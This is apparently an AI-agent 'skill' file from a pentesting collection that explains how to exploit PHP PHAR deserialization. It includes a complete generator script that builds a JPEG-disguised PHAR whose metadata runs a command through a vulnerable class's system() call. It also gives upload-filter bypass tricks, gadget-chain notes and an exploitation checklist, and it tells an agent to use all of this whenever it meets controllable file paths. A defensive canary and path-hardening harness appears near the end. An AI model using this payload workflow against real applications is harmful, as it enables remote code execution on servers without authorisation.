Hacktricks-skills phar-deserialization

How to exploit PHP PHAR deserialization vulnerabilities. Use this skill whenever you need to test for or exploit deserialization vulnerabilities in PHP applications, especially when dealing with file inclusion via phar:// protocol, file operations like file_get_contents(), fopen(), file_exists(), md5_file(), filemtime(), or filesize(). Make sure to use this skill when you find PHP code that processes file paths with phar:// protocol or when you can control file paths in PHP applications.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/file-inclusion/phar-deserialization/SKILL.MD
source content

PHAR Deserialization Exploitation

Overview

PHAR (PHP Archive) files carry a manifest whose metadata field is stored in PHP's native serialized format. Whenever the phar:// stream wrapper opens or stats an archive it parses that manifest and, on PHP versions before 8.0, hands the metadata straight to unserialize(). That turns any filesystem call that accepts a path into a deserialization sink: the application never has to call unserialize() or include the file, it only has to pass a phar:// path to a function that goes through the stream layer, such as:

  • file_get_contents()
  • fopen()
  • file()
  • file_exists()
  • md5_file()
  • filemtime()
  • filesize()

When to Use This Technique

Use PHAR deserialization exploitation when:

  1. You can control, or at least prefix, a file path parameter in a PHP application (phar:// works in relative and absolute paths alike, so a check for ../ on its own does not stop it)
  2. You can get the phar:// wrapper into that path. The application does not have to use phar:// itself; it is enough that it hands your string to a function that honours stream wrappers
  3. You find PHP classes with magic methods such as __destruct(), __wakeup() or __toString() that do something dangerous with attacker-controlled properties, either in the application's own code or in a library it loads
  4. The application performs file operations on user-controlled paths
  5. You need to bypass file upload restrictions (PHAR files can start with magic bytes such as a JPEG header, and the phar:// wrapper does not care about the file extension)

Note that from PHP 8.0 on, the wrapper no longer unserializes metadata automatically; it is only unserialized when code calls Phar::getMetadata() or PharFileInfo::getMetadata(), so against 8.x targets you need to find such a call.

Exploitation Workflow

Step 1: Identify the Vulnerable Class

Look for PHP classes with magic methods that run code on attacker-controlled properties. __wakeup() runs inside unserialize() itself; __destruct() runs when the deserialized object is freed, which for phar metadata happens once the wrapper is done with the archive (at the latest at the end of the request). Both fire without any further action from the application:

<?php
class AnyClass {
    public $data = null;
    public function __construct($data) {
        $this->data = $data;
    }

    function __destruct() {
        system($this->data);  // runs when the deserialized metadata object is destroyed
    }
}

Step 2: Create the Malicious PHAR File

Use the bundled script scripts/create_phar.php to generate a malicious PHAR file. It has to be run with phar.readonly=0 (the default, 1, only blocks writing archives; reading through phar:// is always allowed) and needs a local copy of the target class with the same name and property names. The script:

  1. Creates a new PHAR archive (the phar extension can only create files whose name ends in .phar; rename afterwards if you need another extension)
  2. Adds a dummy file to the archive, since an archive without entries cannot be saved
  3. Sets a custom stub with magic bytes in front of the mandatory __HALT_COMPILER(); token (to bypass file upload filters)
  4. Embeds a serialized object as the archive's metadata via Phar::setMetadata()
  5. Buffers and saves the PHAR file
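The following generator was written for this page as an added example; it is not the skill's bundled scripts/create_phar.php, which is not shown here. It carries out the five steps above for the AnyClass shown in Step 1. The output names poc.phar and poc.jpg and the payload command are arbitrary choices, and the class name and property name are assumed to match the target exactly:

```php
<?php
// Added example generator (not the skill's scripts/create_phar.php).
// Run on the attacker's machine with: php --define phar.readonly=0 create_phar.php
// Assumes the target defines AnyClass with a public $data property as in Step 1.

// Local shadow of the target's class: same name and property, but NO __destruct,
// so that building the archive does not run the payload on your own box.
// unserialize() only needs the class name and properties, so the target's
// real AnyClass::__destruct() still fires when its copy is freed.
class AnyClass {
    public $data = null;
    public function __construct($data) {
        $this->data = $data;
    }
}

$out       = 'poc.phar';   // Phar can only *create* archives ending in .phar
$disguised = 'poc.jpg';    // phar:// ignores the extension when reading
$command   = 'id';         // what the target's system($this->data) will run

if (ini_get('phar.readonly')) {
    fwrite(STDERR, "phar.readonly must be 0: php --define phar.readonly=0 create_phar.php\n");
    exit(1);
}
@unlink($out);
@unlink($disguised);

$phar = new Phar($out);
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');            // archive needs at least one entry
// JPEG magic bytes first, then the stub that every phar must contain
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
$phar->setMetadata(new AnyClass($command));          // serialized into the manifest
$phar->stopBuffering();                              // writes poc.phar to disk

rename($out, $disguised);

// Sanity checks before uploading: image signature present, serialized object present
$head     = file_get_contents($disguised, false, null, 0, 3);
$raw      = file_get_contents($disguised);
$expected = 'O:8:"AnyClass":1:{s:4:"data";s:' . strlen($command) . ':"' . $command . '";}';
echo 'magic bytes ok:      ', ($head === "\xff\xd8\xff" ? 'yes' : 'no'), "\n";
echo 'metadata embedded:   ', (strpos($raw, $expected) !== false ? 'yes' : 'no'), "\n";
echo 'upload ', $disguised, ' and trigger with phar://<path-to-it>', "\n";
```

The manifest is never compressed (only file entries can be), which is why the serialized object can be grepped out of the finished file; if the second check says "no", the class or property name in the shadow class does not match what you intended to emit.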

Step 3: Trigger the Deserialization

When the vulnerable PHP code processes your PHAR file through the phar:// wrapper, the wrapper unserializes the metadata and the magic method runs your payload. The file's name and extension do not matter: the wrapper locates the archive by the __HALT_COMPILER(); token in the stub, so a file the application stored as an image works as long as it contains a phar manifest.

Example Exploitation

Vulnerable Application Code

<?php
class AnyClass {
    public $data = null;
    public function __construct($data) {
        $this->data = $data;
    }

    function __destruct() {
        system($this->data);
    }
}

filesize("phar://test.phar"); // Attacker controls this path

Creating the Exploit

  1. Create the PHAR file using the bundled script:

    php --define phar.readonly=0 scripts/create_phar.php
    
  2. Upload or place the PHAR file where the vulnerable application can access it

  3. Trigger the vulnerability by accessing the vulnerable endpoint with the PHAR file path
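To watch Step 3 happen locally, and to see what the fix looks like, here is an added harness (written for this page, not part of the skill) that builds a harmless canary archive, feeds it to a vulnerable filesize() call and to a hardened one, and finally removes the wrapper altogether. The function names, the Canary class and the temp-file paths are assumptions for the demo; it needs php --define phar.readonly=0 to build the archive:

```php
<?php
// Added example harness, not the skill's own code. Run with:
//   php --define phar.readonly=0 harness.php
// Canary::__wakeup() prints when phar metadata is unserialized. On PHP < 8.0 the
// vulnerable call prints it; on PHP >= 8.0 nothing prints because the wrapper no
// longer unserializes metadata by itself.

class Canary {
    public $marker = 'untouched';
    public function __wakeup() {
        echo "[!] Canary::__wakeup() ran: phar metadata was deserialized\n";
    }
}

// Tiny builder: a benign archive whose metadata is a Canary object.
function build_canary_phar(string $path): void {
    @unlink($path);
    $phar = new Phar($path);
    $phar->startBuffering();
    $phar->addFromString('x.txt', 'x');
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $phar->setMetadata(new Canary());
    $phar->stopBuffering();
}

// Vulnerable: the user-controlled string goes straight to a stat() function.
function vulnerable_size(string $userPath) {
    return @filesize($userPath);
}

// Hardened: refuse every stream-wrapper scheme, then resolve inside a base directory.
// Rejecting only the literal prefix "phar://" is not enough: the wrapper is also
// reachable through other wrappers, so the scheme check is generic.
function hardened_size(string $userPath, string $baseDir) {
    if (strpos($userPath, "\0") !== false) {
        return false;                                  // null byte truncation attempts
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $userPath)) {
        return false;                                  // phar:, php:, compress.zlib:, data:, ...
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $userPath);   // wrappers never resolve here
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;                                  // missing file or traversal outside $baseDir
    }
    return filesize($real);
}

$dir  = sys_get_temp_dir();
$file = $dir . DIRECTORY_SEPARATOR . 'canary.phar';
build_canary_phar($file);

echo "PHP ", PHP_VERSION, "\n";
echo "-- vulnerable_size('phar://...') --\n";
vulnerable_size('phar://' . $file);                    // __wakeup prints here on PHP < 8.0

echo "-- hardened_size --\n";
var_dump(hardened_size('phar://' . $file, $dir));      // bool(false): scheme rejected
var_dump(hardened_size('canary.phar', $dir));          // int: plain relative path is fine
var_dump(hardened_size('../etc/passwd', $dir));        // bool(false): leaves $baseDir

// When the application never needs phar archives, drop the wrapper at bootstrap.
stream_wrapper_unregister('phar');
var_dump(@filesize('phar://' . $file));                // bool(false): wrapper gone
```

The scheme regex is deliberately broader than PHP's own "://" detection so that wrapper nesting through another scheme is caught too; on Windows it will also reject absolute drive paths, which is fine for a base-directory design where only relative names are accepted.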

Bypassing File Upload Restrictions

The PHAR file can start with magic bytes to bypass file type restrictions. For example, putting the JPEG signature \xff\xd8\xff at the beginning of the stub makes checks that only inspect the extension or the first bytes treat the file as an image, while it remains a valid PHAR archive: the phar:// wrapper locates the archive by the __HALT_COMPILER(); token in the stub, not by the extension or the leading bytes. Phar::setStub() still requires that token to be present, so the magic bytes go in front of it, never in place of it. Checks that actually decode the image (for example getimagesize()) are not fooled by three bytes and need a fuller image polyglot.

Common Magic Methods to Exploit

  • __destruct() - called when the object is destroyed; fires on its own once the deserialized metadata is freed
  • __wakeup() - called inside unserialize() right after the object is rebuilt; fires on its own
  • __toString() - called when the object is converted to a string
  • __invoke() - called when the object is called as a function
  • __call() - called when invoking inaccessible methods

Only __wakeup() and __destruct() are triggered directly by the deserialization. The other three need a chain: a __destruct() or __wakeup() in one class that uses an attacker-controlled property as a string, callable or method receiver, so that the property can be filled with an object of another class whose __toString(), __invoke() or __call() does the damage.

Testing Checklist

  • Can you control, or at least prefix, a file path parameter?
  • Can you get phar:// into it: does the sink honour stream wrappers, and is there no scheme check or realpath() in front of it?
  • Is the target running PHP older than 8.0, or does its code call Phar::getMetadata() / PharFileInfo::getMetadata() on an archive you control?
  • Are there classes with dangerous magic methods in the codebase or its dependencies?
  • Can you upload or place files on the server (the extension does not matter to the phar:// wrapper)?
  • On your own machine, is phar.readonly set to 0? It is needed only to create the archive; the target's setting is irrelevant because reading through phar:// is always permitted.
